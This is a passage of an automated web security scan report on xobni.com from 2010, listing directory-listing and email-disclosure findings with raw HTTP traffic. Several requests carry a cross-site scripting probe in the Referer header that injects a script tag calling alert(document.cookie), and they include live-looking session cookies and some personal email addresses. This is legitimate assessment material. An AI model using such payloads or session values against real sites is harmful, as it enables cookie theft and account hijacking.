Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4106
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgets</title>
</head>
<body>
<h1>Index of /media/widgets</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.67. http://www.xobni.com/media/widgetsv2/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/widgetsv2/

Request

GET /media/widgetsv2/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5849
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgetsv2</title>
</head>
<body>
<h1>Index of /media/widgetsv2</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.68. http://www.xobni.com/media/widgetsv3/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/media/widgetsv3/

Request

GET /media/widgetsv3/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /media/widgetsv3</title>
</head>
<body>
<h1>Index of /media/widgetsv3</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/media/">Parent Directory</a>
...[SNIP]...

13.69. http://www.xobni.com/opensource/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/opensource/

Request

GET /opensource/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1013
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource</title>
</head>
<body>
<h1>Index of /opensource</h1>
<table><tr><th><img src="/icons/blank.gif" a
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.70. http://www.xobni.com/opensource/MonoGZipStream/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/opensource/MonoGZipStream/

Request

GET /opensource/MonoGZipStream/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1253
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource/MonoGZipStream</title>
</head>
<body>
<h1>Index of /opensource/MonoGZipStream</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/opensource/">Parent Directory</a>
...[SNIP]...

13.71. http://www.xobni.com/opensource/NsisDotNet/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/opensource/NsisDotNet/

Request

GET /opensource/NsisDotNet/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1242
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /opensource/NsisDotNet</title>
</head>
<body>
<h1>Index of /opensource/NsisDotNet</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/opensource/">Parent Directory</a>
...[SNIP]...

14. Email addresses disclosed previous next
There are 31 instances of this issue:

http://www.xobni.com/about/contact
http://www.xobni.com/autosuggest-outlook
http://www.xobni.com/blackberry
http://www.xobni.com/enterprise
http://www.xobni.com/enterprise/
http://www.xobni.com/enterprise/case_studies
http://www.xobni.com/enterprise/mobile_professionals
http://www.xobni.com/enterprise/sales_professionals
http://www.xobni.com/enterprise/salesforce_extension
http://www.xobni.com/enterprise/sharepoint_extension
http://www.xobni.com/enterprise/sign_up
http://www.xobni.com/enterprise/solutions_providers
http://www.xobni.com/errors/403.php
http://www.xobni.com/errors/general.php
http://www.xobni.com/icons/
http://www.xobni.com/javascripts/jquery.base64.min.js
http://www.xobni.com/learnmore/mobile
http://www.xobni.com/learnmore/mobile/
http://www.xobni.com/learnmore/mobile/blackberry/
http://www.xobni.com/legal/ip_policy
http://www.xobni.com/legal/privacy
http://www.xobni.com/legal/trademarks
http://www.xobni.com/mobile
http://www.xobni.com/mobile/
http://www.xobni.com/opensource/NsisDotNet/README.htm
http://www.xobni.com/press/05202010_german_release.php
http://www.xobni.com/press/09022010_harris_survey
http://www.xobni.com/press/10282010_french_release.php
http://www.xobni.com/support/
http://www.xobni.com/support/index.php
https://www.xobni.com/support/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

14.1. http://www.xobni.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/contact

Issue detail

The following email address was disclosed in the response:

billing@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni - Search Yo
...[SNIP]...
<a href="mailto:billing@xobni.com">
...[SNIP]...

14.2. http://www.xobni.com/autosuggest-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/autosuggest-outlook

Issue detail

The following email addresses were disclosed in the response:

fiona.hurley@cisco.com
jon.doe@cisco.com
lraines-abc@cisco.com
wturlock2000@cisco.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Rank Powere
...[SNIP]...
<div style="top: 38px; left: 158px;">jon.doe@cisco.com</div>
                       <div style="top: 58px; left: 158px; color: #999999;">wturlock2000@cisco.com</div>
                       <div style="top: 78px; left: 158px; color: #999999;">lraines-abc@cisco.com</div>
                       <div style="top: 98px; left: 158px; color: #999999;">fiona.hurley@cisco.com</div>
...[SNIP]...
<p>Jon Doe (with the email address jon.doe@cisco.com) was CC'd on an email your boss sent you. You need to quickly write Jon an email, but let's assume that all you remember is that he worked at Cisco. You've even forgotten his name.</p>
...[SNIP]...

14.3. http://www.xobni.com/blackberry previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/blackberry

Issue detail

The following email address was disclosed in the response:

john.smith@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni f..r BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.4. http://www.xobni.com/enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.5. http://www.xobni.com/enterprise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.6. http://www.xobni.com/enterprise/case_studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/case_studies

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/case_studies HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.7. http://www.xobni.com/enterprise/mobile_professionals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/mobile_professionals

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/mobile_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.8. http://www.xobni.com/enterprise/sales_professionals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sales_professionals

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/sales_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.9. http://www.xobni.com/enterprise/salesforce_extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/salesforce_extension

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/salesforce_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.10. http://www.xobni.com/enterprise/sharepoint_extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sharepoint_extension

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/sharepoint_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.11. http://www.xobni.com/enterprise/sign_up previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sign_up

Issue detail

The following email address was disclosed in the response:

info@xobni.com

Request

GET /enterprise/sign_up HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15868

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...

14.12. http://www.xobni.com/enterprise/solutions_providers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/solutions_providers

Issue detail

The following email addresses were disclosed in the response:

christine.purwin@rimoc.com
info@xobni.com
xobni@rimoc.com

Request

GET /enterprise/solutions_providers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni Enterprise
...[SNIP]...
<a href="mailto:info@xobni.com">info@xobni.com</a>
...[SNIP]...
<a href="mailto:christine.purwin@rimoc.com" target="_blank">christine.purwin@rimoc.com</a> / <a href="mailto:xobni@rimoc.com" target="_blank">xobni@rimoc.com</a>
...[SNIP]...

14.13. http://www.xobni.com/errors/403.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/403.php

Issue detail

The following email address was disclosed in the response:

webmaster@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Error 403 Forbidd
...[SNIP]...
<a href="mailto:webmaster@xobni.com">
...[SNIP]...

14.14. http://www.xobni.com/errors/general.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/general.php

Issue detail

The following email address was disclosed in the response:

webmaster@xobni.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Xobni.com: Error<
...[SNIP]...
<a href="mailto:webmaster@xobni.com">
...[SNIP]...

14.15. http://www.xobni.com/icons/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/icons/

Issue detail

The following email addresses were disclosed in the response:

kevinh@kevcom.com
mike@hyperreal.org

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:17 GMT
Server: Apache
